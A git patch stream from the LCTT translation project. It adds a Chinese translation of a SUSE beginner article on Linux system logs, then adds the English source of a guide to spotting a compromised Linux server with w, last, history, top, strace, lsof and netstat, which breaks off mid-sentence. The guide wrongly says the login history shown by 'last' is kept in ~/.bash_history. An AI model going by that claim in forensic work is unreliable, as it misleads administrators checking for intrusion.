+[24]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#documentation +[25]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#tutorials +[26]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#examples +[27]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#the-code +[28]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#troubleshooting +[29]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#and-still-more +[30]:http://netdevconf.org/1.2/session.html?daniel-borkmann +[31]:http://netdevconf.org/1.2/slides/oct5/07_tcws_daniel_borkmann_2016_tcws.pdf +[32]:http://netdevconf.org/1.2/session.html?jamal-tc-workshop +[33]:http://www.netdevconf.org/1.1/proceedings/slides/borkmann-tc-classifier-cls-bpf.pdf +[34]:http://www.netdevconf.org/1.1/proceedings/papers/On-getting-tc-classifier-fully-programmable-with-cls-bpf.pdf +[35]:https://archive.fosdem.org/2016/schedule/event/ebpf/attachments/slides/1159/export/events/attachments/ebpf/slides/1159/ebpf.pdf +[36]:https://fosdem.org/2017/schedule/event/ebpf_xdp/ +[37]:http://people.netfilter.org/hawk/presentations/xdp2016/xdp_intro_and_use_cases_sep2016.pdf +[38]:http://netdevconf.org/1.2/session.html?jesper-performance-workshop +[39]:http://people.netfilter.org/hawk/presentations/OpenSourceDays2017/XDP_DDoS_protecting_osd2017.pdf +[40]:http://people.netfilter.org/hawk/presentations/MM-summit2017/MM-summit2017-JesperBrouer.pdf +[41]:http://netdevconf.org/2.1/session.html?gospodarek +[42]:http://jvns.ca/blog/2017/04/07/xdp-bpf-tutorial/ +[43]:http://www.slideshare.net/ThomasGraf5/clium-container-networking-with-bpf-xdp +[44]:http://www.slideshare.net/Docker/cilium-bpf-xdp-for-containers-66969823 +[45]:https://www.youtube.com/watch?v=TnJF7ht3ZYc&list=PLkA60AVN3hh8oPas3cq2VA9xB7WazcIgs +[46]:http://www.slideshare.net/ThomasGraf5/cilium-fast-ipv6-container-networking-with-bpf-and-xdp +[47]:https://fosdem.org/2017/schedule/event/cilium/ +[48]:http://openvswitch.org/support/ovscon2016/7/1120-tu.pdf +[49]:http://openvswitch.org/support/ovscon2016/7/1245-bertrone.pdf +[50]:https://www.spinics.net/lists/xdp-newbies/msg00179.html +[51]:https://www.spinics.net/lists/xdp-newbies/msg00181.html +[52]:https://www.spinics.net/lists/xdp-newbies/msg00185.html +[53]:http://schd.ws/hosted_files/ossna2017/da/BPFandXDP.pdf +[54]:https://speakerdeck.com/tuxology/the-bsd-packet-filter +[55]:http://www.slideshare.net/brendangregg/bpf-tracing-and-more +[56]:http://fr.slideshare.net/brendangregg/linux-bpf-superpowers +[57]:https://www.socallinuxexpo.org/sites/default/files/presentations/Room%20211%20-%20IOVisor%20-%20SCaLE%2014x.pdf +[58]:https://events.linuxfoundation.org/sites/events/files/slides/ebpf_on_the_mainframe_lcon_2015.pdf +[59]:https://events.linuxfoundation.org/sites/events/files/slides/tracing-linux-ezannoni-linuxcon-ja-2015_0.pdf +[60]:https://events.linuxfoundation.org/sites/events/files/slides/bpf_collabsummit_2015feb20.pdf +[61]:https://lwn.net/Articles/603983/ +[62]:http://www.slideshare.net/vh21/meet-cutebetweenebpfandtracing +[63]:http://www.slideshare.net/vh21/linux-kernel-tracing +[64]:http://www.slideshare.net/ThomasGraf5/linux-networking-explained +[65]:http://www.slideshare.net/ThomasGraf5/linuxcon-2015-linux-kernel-networking-walkthrough +[66]:http://www.tcpdump.org/papers/bpf-usenix93.pdf +[67]:http://www.gsp.com/cgi-bin/man.cgi?topic=bpf +[68]:http://borkmann.ch/talks/2013_devconf.pdf +[69]:http://borkmann.ch/talks/2014_devconf.pdf +[70]:https://blog.cloudflare.com/introducing-the-bpf-tools/ +[71]:http://biot.com/capstats/bpf.html +[72]:https://www.iovisor.org/technology/xdp +[73]:https://github.com/iovisor/bpf-docs/raw/master/Express_Data_Path.pdf +[74]:https://events.linuxfoundation.org/sites/events/files/slides/iovisor-lc-bof-2016.pdf +[75]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#about-xdp-1 +[76]:http://netdevconf.org/1.2/session.html?herbert-xdp-workshop +[77]:https://schd.ws/hosted_files/2016p4workshop/1d/Intel%20Fastabend-P4%20on%20the%20Edge.pdf +[78]:https://ovsorbit.benpfaff.org/#e11 +[79]:http://open-nfp.org/media/pdfs/Open_NFP_P4_EBPF_Linux_TC_Offload_FINAL.pdf +[80]:https://opensource.googleblog.com/2016/11/cilium-networking-and-security.html +[81]:https://ovsorbit.benpfaff.org/ +[82]:http://blog.ipspace.net/2016/10/fast-linux-packet-forwarding-with.html +[83]:http://netdevconf.org/2.1/session.html?bertin +[84]:http://netdevconf.org/2.1/session.html?zhou +[85]:http://www.slideshare.net/IOVisor/ceth-for-xdp-linux-meetup-santa-clara-july-2016 +[86]:http://info.iet.unipi.it/~luigi/vale/ +[87]:https://github.com/YutaroHayakawa/vale-bpf +[88]:https://www.stamus-networks.com/2016/09/28/suricata-bypass-feature/ +[89]:http://netdevconf.org/1.2/slides/oct6/10_suricata_ebpf.pdf +[90]:https://www.slideshare.net/ennael/kernel-recipes-2017-ebpf-and-xdp-eric-leblond +[91]:https://github.com/iovisor/bpf-docs/blob/master/university/sigcomm-ccr-InKev-2016.pdf +[92]:https://fosdem.org/2017/schedule/event/go_bpf/ +[93]:https://wkz.github.io/ply/ +[94]:https://www.kernel.org/doc/Documentation/networking/filter.txt +[95]:https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/tree/Documentation/bpf/bpf_design_QA.txt?id=2e39748a4231a893f057567e9b880ab34ea47aef +[96]:https://github.com/iovisor/bpf-docs/blob/master/eBPF.md +[97]:https://github.com/iovisor/bcc/tree/master/docs +[98]:https://github.com/iovisor/bpf-docs/ +[99]:https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md +[100]:http://man7.org/linux/man-pages/man2/bpf.2.html +[101]:http://man7.org/linux/man-pages/man8/tc-bpf.8.html +[102]:https://prototype-kernel.readthedocs.io/en/latest/bpf/index.html +[103]:http://docs.cilium.io/en/latest/bpf/ +[104]:https://ferrisellis.com/tags/ebpf/ +[105]:http://linux-ip.net/articles/Traffic-Control-HOWTO/ +[106]:http://lartc.org/lartc.html +[107]:https://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/tree/man/man8 +[108]:https://git.kernel.org/pub/scm/linux/kernel/git/shemminger/iproute2.git/tree/doc?h=v4.13.0 +[109]:https://git.kernel.org/pub/scm/linux/kernel/git/shemminger/iproute2.git/tree/doc/actions?h=v4.13.0 +[110]:http://netdevconf.org/1.2/session.html?jamal-tc-workshop +[111]:https://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/commit/bash-completion/tc?id=27d44f3a8a4708bcc99995a4d9b6fe6f81e3e15b +[112]:https://prototype-kernel.readthedocs.io/en/latest/networking/XDP/index.html +[113]:https://marc.info/?l=linux-netdev&m=147436253625672 +[114]:http://docs.cilium.io/en/latest/bpf/ +[115]:https://github.com/iovisor/bcc/blob/master/INSTALL.md +[116]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/include/linux/bpf.h +[117]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/include/uapi/linux/bpf.h +[118]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/include/linux/filter.h +[119]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/include/uapi/linux/filter.h +[120]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/kernel/bpf +[121]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/net/core/filter.c +[122]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/arch/x86/net/bpf_jit_comp.c +[123]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/net/sched +[124]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/kernel/trace/bpf_trace.c +[125]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/kernel/seccomp.c +[126]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/tools/testing/selftests/seccomp/seccomp_bpf.c +[127]:https://github.com/iovisor/bcc/blob/master/docs/kernel-versions.md +[128]:https://github.com/iovisor/bcc/blob/master/FAQ.txt +[129]:https://www.kernel.org/doc/Documentation/networking/filter.txt +[130]:https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md +[131]:https://github.com/iovisor/bcc/blob/master/src/python/bcc/__init__.py +[132]:https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md#output +[133]:https://www.spinics.net/lists/netdev/msg406926.html +[134]:https://github.com/cilium/bpf-map +[135]:https://github.com/badboy/bpf-map +[136]:https://stackoverflow.com/questions/tagged/bpf +[137]:https://github.com/iovisor/xdp-vagrant +[138]:https://github.com/zlim/bcc-docker +[139]:http://lists.openwall.net/netdev/ +[140]:http://vger.kernel.org/vger-lists.html#xdp-newbies +[141]:http://lists.iovisor.org/pipermail/iovisor-dev/ +[142]:https://twitter.com/IOVisor +[143]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#what-is-bpf +[144]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#dive-into-the-bytecode +[145]:https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/#resources +[146]:https://github.com/qmonnet/whirl-offload/commits/gh-pages/_posts/2016-09-01-dive-into-bpf.md +[147]:http://netdevconf.org/1.2/session.html?jakub-kicinski +[148]:http://www.slideshare.net/IOVisor/express-data-path-linux-meetup-santa-clara-july-2016 +[149]:https://cdn.shopify.com/s/files/1/0177/9886/files/phv2017-gbertin.pdf +[150]:https://github.com/cilium/cilium +[151]:https://fosdem.org/2017/schedule/event/stateful_ebpf/ +[152]:http://vger.kernel.org/vger-lists.html#xdp-newbies +[153]:https://github.com/iovisor/bcc/blob/master/docs/kernel-versions.md +[154]:https://github.com/qmonnet/whirl-offload/commit/d694f8081ba00e686e34f86d5ee76abeb4d0e429 +[155]:http://openvswitch.org/pipermail/dev/2014-October/047421.html +[156]:https://qmonnet.github.io/whirl-offload/2016/07/15/beba-research-project/ +[157]:https://www.iovisor.org/resources/blog +[158]:http://www.brendangregg.com/blog/2016-03-05/linux-bpf-superpowers.html +[159]:http://p4.org/ +[160]:https://github.com/iovisor/bcc/tree/master/src/cc/frontends/p4 +[161]:https://github.com/p4lang/p4c/blob/master/backends/ebpf/README.md +[162]:https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md +[163]:https://github.com/iovisor/bcc/blob/master/docs/tutorial_bcc_python_developer.md +[164]:https://github.com/goldshtn/linux-tracing-workshop +[165]:https://blog.yadutaf.fr/2017/07/28/tracing-a-packet-journey-using-linux-tracepoints-perf-ebpf/ +[166]:https://open-nfp.org/dataplanes-ebpf/technical-papers/ +[167]:http://netdevconf.org/2.1/session.html?gospodarek +[168]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/samples/bpf +[169]:https://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/tree/examples/bpf +[170]:https://github.com/iovisor/bcc/tree/master/examples +[171]:http://man7.org/linux/man-pages/man8/tc-bpf.8.html +[172]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/net/core/dev.c +[173]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/drivers/net/ethernet/mellanox/mlx4/ +[174]:https://github.com/iovisor/bcc/ +[175]:https://github.com/iovisor/bcc/blob/master/src/python/bcc/__init__.py +[176]:https://github.com/iovisor/bcc/blob/master/src/cc/libbpf.c +[177]:https://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/tree/tc +[178]:https://git.kernel.org/cgit/linux/kernel/git/shemminger/iproute2.git/tree/lib/bpf.c +[179]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/tools/net +[180]:https://git.kernel.org/pub/scm/linux/kernel/git/davem/net-next.git/tree/tools/bpf +[181]:https://github.com/iovisor/bcc/tree/master/src/cc/frontends/p4/compiler +[182]:https://github.com/iovisor/bcc/tree/master/src/lua +[183]:https://reviews.llvm.org/D6494 +[184]:https://github.com/llvm-mirror/llvm/commit/4fe85c75482f9d11c5a1f92a1863ce30afad8d0d +[185]:https://github.com/iovisor/ubpf/ +[186]:https://github.com/YutaroHayakawa/generic-ebpf +[187]:https://github.com/YutaroHayakawa/vale-bpf +[188]:https://github.com/qmonnet/rbpf +[189]:https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git +[190]:https://github.com/torvalds/linux +[191]:https://github.com/iovisor/bcc/blob/master/docs/kernel-versions.md +[192]:https://qmonnet.github.io/whirl-offload/categories/#BPF From 0c92b01f4268b5893ad7d09ae91e6fc865d00991 Mon Sep 17 00:00:00 2001 From: DarkSun Date: Mon, 4 Dec 2017 00:58:26 +0800 Subject: [PATCH 0208/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=AF=95?= =?UTF-8?q?=20(#6432)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * take a break * translated * move to translated --- ...stem Logs: Understand Your Linux System.md | 60 ---------------- ...stem Logs: Understand Your Linux System.md | 68 +++++++++++++++++++ 2 files changed, 68 insertions(+), 60 deletions(-) delete mode 100644 sources/tech/20171117 System Logs: Understand Your Linux System.md create mode 100644 translated/tech/20171117 System Logs: Understand Your Linux System.md diff --git a/sources/tech/20171117 System Logs: Understand Your Linux System.md b/sources/tech/20171117 System Logs: Understand Your Linux System.md deleted file mode 100644 index a711ee2c05..0000000000 --- a/sources/tech/20171117 System Logs: Understand Your Linux System.md +++ /dev/null @@ -1,60 +0,0 @@ -translating by lujun9972 -### System Logs: Understand Your Linux System - -![chabowski](https://www.suse.com/communities/blog/files/2016/03/chabowski_avatar_1457537819-100x100.jpg) - By: [chabowski][1] - -The following article is part of a series of articles that provide tips and tricks for Linux newbies – or Desktop users that are not yet experienced with regard to certain topics). This series intends to complement the special edition #30 “[Getting Started with Linux][2]” based on [openSUSE Leap][3], recently published by the [Linux Magazine,][4] with valuable additional information. - -This article has been contributed by Romeo S. Romeo is a PDX-based enterprise Linux professional specializing in scalable solutions for innovative corporations looking to disrupt the marketplace. - -System logs are incredibly important files in Linux. Special programs that run in the background (usually called daemons or servers) handle most of the tasks on your Linux system. Whenever these daemons do anything, they write the details of the task to a log file as a sort of “history” of what they’ve been up to. These daemons perform actions ranging from syncing your clock with an atomic clock to managing your network connection. All of this is written to log files so that if something goes wrong, you can look into the specific log file and see what happened. - -![](https://www.suse.com/communities/blog/files/2017/11/markus-spiske-153537-300x450.jpg) - -Photo by Markus Spiske on Unsplash - -There are many different logs on your Linux computer. Historically, they were mostly stored in the /var/log directory in a plain text format. Quite a few still are, and you can read them easily with the less pager. On your freshly installed openSUSE Leap 42.3 system, and on most modern systems, important logs are stored by the systemd init system. This is the system that handles starting up daemons and getting the computer ready for use on startup. The logs handled by systemd are stored in a binary format, which means that they take up less space and can more easily be viewed or exported in various formats, but the downside is that you need a special tool to view them. Luckily, this tool comes installed on your system: it’s called journalctl and by default, it records all of the logs from every daemon to one location. - -To take a look at your systemd log, just run the journalctl command. This will open up the combined logs in the less pager. To get a better idea of what you’re looking at, see a single log entry from journalctl here: - -``` -Jul 06 11:53:47 aaathats3as pulseaudio[2216]: [pulseaudio] alsa-util.c: Disabling timer-based scheduling because running inside a VM. -``` - -This individual log entry contains (in order) the date and time of the entry, the hostname of the computer, the name of the process that logged the entry, the PID (process ID number) of the process that logged the entry, and then the log entry itself. - -If a program running on your system is misbehaving, look at the log file and search (with the “/” key followed by the search term) for the name of the program. Chances are that if the program is reporting errors that are causing it to malfunction, then the errors will show up in the system log. Sometimes errors are verbose enough for you to be able to fix them yourself. Other times, you have to search for a solution on the Web. Google is usually the most convenient search engine to use for weird Linux problems -![](https://www.suse.com/communities/blog/files/2017/09/Sunglasses_Emoji-450x450.png) -. However, be sure that you only enter the actual log entry, because the rest of the information at the beginning of the line (date, host name, PID) is unnecessary and could return false positives. - -After you search for the problem, the first few results are usually pages containing various things that you can try for solutions. Of course, you shouldn’t just follow random instructions that you find on the Internet: always be sure to do additional research into what exactly you will be doing and what the effects of it are before following any instructions. With that being said, the results for a specific entry from the system’s log file are usually much more useful than results from searching more generic terms that describe the malfunctioning of the program directly. This is because many different things could cause a program to misbehave, and multiple problems could cause identical misbehaviors. - -For example, a lack of audio on the system could be due to a massive amount of different reasons, ranging from speakers not being plugged in, to back end sound systems misbehaving, to a lack of the proper drivers. If you search for a general problem, you’re likely to see a lot of irrelevant solutions and you’ll end up wasting your time on a wild goose chase. With a specific search of an actual line from a log file, you can see other people who have had the same log entry. See Picture 1 and Picture 2 to compare and contrast between the two types of searching. - -![](https://www.suse.com/communities/blog/files/2017/11/picture1-450x450.png) - -Picture 1 shows generic, unspecific Google results for a general misbehavior of the system. This type of searching generally doesn’t help much. - -![](https://www.suse.com/communities/blog/files/2017/11/picture2-450x450.png) - -Picture 2 shows more specific, helpful Google results for a particular log file line. This type of searching is generally very helpful. - -There are some systems that log their actions outside of journalctl. The most important ones that you may find yourself dealing with on a desktop system are /var/log/zypper.log for openSUSE’s package manager, /var/log/boot.log for those messages that scroll by too fast to be read when you turn your system on, and /var/log/ntp if your Network Time Protocol Daemon is having troubles syncing time. One more important place to look for errors if you’re having problems with specific hardware is the Kernel Ring Buffer, which you can read by typing the dmesg -H command (this opens in the less pager as well). The Kernel Ring Buffer is stored in RAM, so you lose it when you reboot your system, but it contains important messages from the Linux kernel about important events, such as hardware being added, modules being loaded, or strange network errors. - -Hopefully you are prepared now to understand your Linux system better! Have a lot of fun! - --------------------------------------------------------------------------------- - -via: https://www.suse.com/communities/blog/system-logs-understand-linux-system/ - -作者:[chabowski] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[1]:https://www.suse.com/communities/blog/author/chabowski/ -[2]:http://www.linux-magazine.com/Resources/Special-Editions/30-Getting-Started-with-Linux -[3]:https://en.opensuse.org/Portal:42.3 -[4]:http://www.linux-magazine.com/ diff --git a/translated/tech/20171117 System Logs: Understand Your Linux System.md b/translated/tech/20171117 System Logs: Understand Your Linux System.md new file mode 100644 index 0000000000..dceea12a63 --- /dev/null +++ b/translated/tech/20171117 System Logs: Understand Your Linux System.md @@ -0,0 +1,68 @@ +### 系统日志: 了解你的Linux系统 + +![chabowski](https://www.suse.com/communities/blog/files/2016/03/chabowski_avatar_1457537819-100x100.jpg) + By: [chabowski][1] + +本文摘自教授Linux小白(或者非资深桌面用户)技巧的系列文章. 该系列文章旨在为由LinuxMagazine基于 [openSUSE Leap][3] 发布的第30期特别版 “[Getting Started with Linux][2]” 提供补充说明. + +本文作者是 Romeo S. Romeo, 他是一名 PDX-based enterprise Linux 专家,转为创新企业提供富有伸缩性的解决方案. + +Linux系统日志非常重要. 后台运行的程序(通常被称为守护进程或者服务进程)处理了你Linux系统中的大部分任务. 当这些守护进程工作时,它们将任务的详细信息记录进日志文件中,作为他们做过什么的历史信息. 这些守护进程的工作内容涵盖从使用原子钟同步时钟到管理网络连接. 所有这些都被记录进日志文件,这样当有错误发生时,你可以通过查阅特定的日志文件来看出发生了什么. + +![](https://www.suse.com/communities/blog/files/2017/11/markus-spiske-153537-300x450.jpg) + +Photo by Markus Spiske on Unsplash + +有很多不同的日志. 历史上, 他们一般以纯文本的格式存储到 `/var/log` 目录中. 现在依然有很多日志这样做, 你可以很方便的使用 `less` 来查看它们. +在新装的 `openSUSE Leap 42.3` 以及大多数现代操作系统上,重要的日志由 `systemd` 初始化系统存储. `systemd`这套系统负责启动守护进程并在系统启动时让计算机做好被使用的准备。 +由 `systemd` 记录的日志以二进制格式存储, 这使地它们消耗的空间更小,更容易被浏览,也更容易被导出成其他各种格式,不过坏处就是你必须使用特定的工具才能查看. +好在, 这个工具已经预安装在你的系统上了: 它的名字叫 `journalctl`,而且默认情况下, 它会将每个守护进程的所有日志都记录到一个地方. + +只需要运行 `journalctl` 命令就能查看你的 `systemd` 日志了. 它会用 `less` 分页器显示各种日志. 为了让你有个直观的感受, 下面是`journalctl` 中摘录的一条日志记录: + +``` +Jul 06 11:53:47 aaathats3as pulseaudio[2216]: [pulseaudio] alsa-util.c: Disabling timer-based scheduling because running inside a VM. +``` + +这条独立的日志记录以此包含了记录的日期和时间, 计算机名, 记录日志的进程名, 记录日志的进程PID, 以及日志内容本身. + +若系统中某个程序运行出问题了, 则可以查看日志文件并搜索(使用 “/” 加上要搜索的关键字)程序名称. 有可能导致该程序出问题的错误会记录到系统日志中. +有时,错误信息会足够详细让你能够修复该问题. 其他时候, 你需要在Web上搜索解决方案. Google就很适合来搜索奇怪的Linux问题. +![](https://www.suse.com/communities/blog/files/2017/09/Sunglasses_Emoji-450x450.png) +不过搜索时请注意你只输入了日志的内容, 行首的那些信息(日期, 主机名, 进程ID) 是无意义的,会干扰搜索结果. + +解决方法一般在搜索结果的前几个连接中就会有了. 当然,你不能只是无脑得运行从互联网上找到的那些命令: 请一定先搞清楚你要做的事情是什么,它的效果会是什么. +据说, 从系统日志中查询日志要比直接搜索描述故障的关键字要有用的多. 因为程序出错有很多原因, 而且同样的故障表现也可能由多种问题引发的. + +比如, 系统无法发声的原因有很多, 可能是播放器没有插好, 也可能是声音系统出故障了, 还可能是缺少合适的驱动程序. +如果你只是泛泛的描述故障表现, 你会找到很多无关的解决方法,而你也会浪费大量的时间. 而指定搜索日志文件中的内容, 你只会查询出他人也有相同日志内容的结果. +你可以对比一下图1和图2. + +![](https://www.suse.com/communities/blog/files/2017/11/picture1-450x450.png) + +图 1 搜索系统的故障表现只会显示泛泛的,不精确的结果. 这种搜索通常没什么用. + +![](https://www.suse.com/communities/blog/files/2017/11/picture2-450x450.png) + +图 2 搜索特定的日志行会显示出精确的,有用的结果. 这种搜索通常很有用. + +也有一些系统不用 `journalctl` 来记录日志. 在桌面系统中最常见的这类日志包括用于 `/var/log/zypper.log` 记录openSUSE包管理器的行为; `/var/log/boot.log` 记录系统启动时的消息,这类消息往往滚动的特别块,根本看不过来; `/var/log/ntp` 用来记录 Network Time Protocol 守护进程同步时间时发生的错误. +另一个存放硬件故障信息的地方是 `Kernel Ring Buffer`(内核环状缓冲区), 你可以输入 `demesg -H` 命令来查看(这条命令也会调用 `less` 分页器来查看). +`Kernel Ring Buffer` 存储在内存中, 因此会在重启电脑后丢失. 不过它包含了Linux内核中的重要事件, 比如新增了硬件, 加载了模块, 以及奇怪的网络错误. + +希望你已经准备好深入了解你的Linux系统了! 祝你玩的开心! + +-------------------------------------------------------------------------------- + +via: https://www.suse.com/communities/blog/system-logs-understand-linux-system/ + +作者:[chabowski] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://www.suse.com/communities/blog/author/chabowski/ +[2]:http://www.linux-magazine.com/Resources/Special-Editions/30-Getting-Started-with-Linux +[3]:https://en.opensuse.org/Portal:42.3 +[4]:http://www.linux-magazine.com/ From 8f52cee72a69ff34f7e887dee439c9ff3f4dac0b Mon Sep 17 00:00:00 2001 From: DarkSun Date: Mon, 4 Dec 2017 01:00:31 +0800 Subject: [PATCH 0209/1627] =?UTF-8?q?=E9=80=89=E9=A2=98=E5=B9=B6=E7=94=B3?= =?UTF-8?q?=E8=AF=B7=E7=BF=BB=E8=AF=91=20How=20To=20Tell=20If=20Your=20Lin?= =?UTF-8?q?ux=20Server=20Has=20Been=20Compromised=20(#6433)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * translated * moved to translated directory * 选题: How To Tell If Your Linux Server Has Been Compromised * 申请翻译 --- ... Your Linux Server Has Been Compromised.md | 156 ++++++++++++++++++ 1 file changed, 156 insertions(+) create mode 100644 sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md diff --git a/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md b/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md new file mode 100644 index 0000000000..dd61ad7a95 --- /dev/null +++ b/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md @@ -0,0 +1,156 @@ +translating by lujun9972 +How To Tell If Your Linux Server Has Been Compromised +-------------- + +A server being compromised or hacked for the purpose of this guide is an unauthorized person or bot logging into the server in order to use it for their own, usually negative ends. + +Disclaimer: If your server has been compromised by a state organization like the NSA or a serious criminal group then you will not notice any problems and the following techniques will not register their presence. + +However, the majority of compromised servers are carried out by bots i.e. automated attack programs, in-experienced attackers e.g. “script kiddies”, or dumb criminals. + +These sorts of attackers will abuse the server for all it’s worth whilst they have access to it and take few precautions to hide what they are doing. + +### Symptoms of a compromised server + +When a server has been compromised by an in-experienced or automated attacker they will usually do something with it that consumes 100% of a resource. This resource will usually be either the CPU for something like crypt-currency mining or email spamming, or bandwidth for launching a DOS attack. + +This means that the first indication that something is amiss is that the server is “going slow”. This could manifest in the website serving pages much slower than usual, or email taking many minutes to deliver or send. + +So what should you look for? + +### Check 1 - Who’s currently logged in? + +The first thing you should look for is who is currently logged into the server. It is not uncommon to find the attacker actually logged into the server and working on it. + +The shell command to do this is w. Running w gives the following output: + +``` + 08:32:55 up 98 days, 5:43, 2 users, load average: 0.05, 0.03, 0.00 +USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT +root pts/0 113.174.161.1 08:26 0.00s 0.03s 0.02s ssh root@coopeaa12 +root pts/1 78.31.109.1 08:26 0.00s 0.01s 0.00s w + +``` + +One of those IP’s is a UK IP and the second is Vietnamese. That’s probably not a good thing. + +Stop and take a breath, don’t panic and simply kill their SSH connection. Unless you can stop then re-entering the server they will do so quickly and quite likely kick you off and stop you getting back in. + +Please see the What should I do if I’ve been compromised section at the end of this guide no how to proceed if you do find evidence of compromise. + +The whois command can be run on IP addresses and will tell you what all the information about the organization that the IP is registered to, including the country. + +### Check 2 - Who has logged in? + +Linux servers keep a record of which users logged in, from what IP, when and for how long. This information is accessed with the last command. + +The output looks like this: + +``` +root pts/1 78.31.109.1 Thu Nov 30 08:26 still logged in +root pts/0 113.174.161.1 Thu Nov 30 08:26 still logged in +root pts/1 78.31.109.1 Thu Nov 30 08:24 - 08:26 (00:01) +root pts/0 113.174.161.1 Wed Nov 29 12:34 - 12:52 (00:18) +root pts/0 14.176.196.1 Mon Nov 27 13:32 - 13:53 (00:21) + +``` + +There is a mix of my UK IP’s and some Vietnamese ones, with the top two still logged in. If you see any IP’s that are not authorized then refer to the final section. + +The login history is contained in a text file at ~/.bash_history and is therefore easily removable. Often, attackers will simply delete this file to try to cover their tracks. Consequently, if you run last and only see your current login, this is a Bad Sign. + +If there is no login history be very, very suspicious and continue looking for indications of compromise. + +### Check 3 - Review the command history + +This level of attacker will frequently take no precautions to leave no command history so running the history command will show you everything they have done. Be on the lookout for wget or curl commands to download out-of-repo software such as spam bots or crypto miners. + +The command history is contained in the ~/.bash_history file so some attackers will delete this file to cover what they have done. Just as with the login history, if you run history and don’t see anything then the history file has been deleted. Again this is a Bad Sign and you should review the server very carefully. + +### Check 4 - What’s using all the CPU? + +The sorts of attackers that you will encounter usually don’t take too many precautions to hide what they are doing. So they will run processes that consume all the CPU. This generally makes it pretty easy to spot them. Simply run top and look at the highest process. + +This will also show people exploiting your server without having logged in. This could be, for example, someone using an unprotected form-mail script to relay spam. + +If you don’t recognize the top process then either Google its name or investigate what it’s doing with losf or strace. + +To use these tools first copy its PID from top and run: + +``` +strace -p PID + +``` + +This will display all the system calls the process is making. It’s a lot of information but looking through it will give you a good idea what’s going on. + +``` +lsof -p PID + +``` + +This program will list the open files that the process has. Again, this will give you a good idea what it’s doing by showing you what files it is accessing. + +### Check 5 - Review the all the system processes + +If an unauthorized process is not consuming enough CPU to get listed noticeably on top it will still get displayed in a full process listing with ps. My proffered command is ps auxf for providing the most information clearly. + +You should be looking for any processes that you don’t recognize. The more times you run ps on your servers (which is a good habit to get into) the more obvious an alien process will stand out. + +### Check 6 - Review network usage by process + +The command iftop functions like top to show a ranked list of processes that are sending and receiving network data along with their source and destination. A process like a DOS attack or spam bot will immediately show itself at the top of the list. + +### Check 7 - What processes are listening for network connections? + +Often an attacker will install a program that doesn’t do anything except listen on the network port for instructions. This does not consume CPU or bandwidth whilst it is waiting so can get overlooked in the top type commands. + +The commands lsof and netstat will both list all networked processes. I use them with the following options: + +``` +lsof -i + +``` + +``` +netstat -plunt + +``` + +You should look for any process that is listed as in the LISTEN or ESTABLISHED status as these processes are either waiting for a connection (LISTEN) or have a connection open (ESTABLISHED). If you don’t recognize these processes use strace or lsof to try to see what they are doing. + +### What should I do if I’ve been compromised? + +The first thing to do is not to panic, especially if the attacker is currently logged in. You need to be able to take back control of the machine before the attacker is aware that you know about them. If they realize you know about them they may well lock you out of your server and start destroying any assets out of spite. + +If you are not very technical then simply shut down the server. Either from the server itself with shutdown -h now or systemctl poweroff. Or log into your hosting provider’s control panel and shut down the server. Once it’s powered off you can work on the needed firewall rules and consult with your provider in your own time. + +If you’re feeling a bit more confident and your hosting provider has an upstream firewall then create and enable the following two rules in this order: + +1. Allow SSH traffic from only your IP address. + +2. Block everything else, not just SSH but every protocol on every port. + +This will immediately kill their SSH session and give only you access to the server. + +If you don’t have access to an upstream firewall then you will have 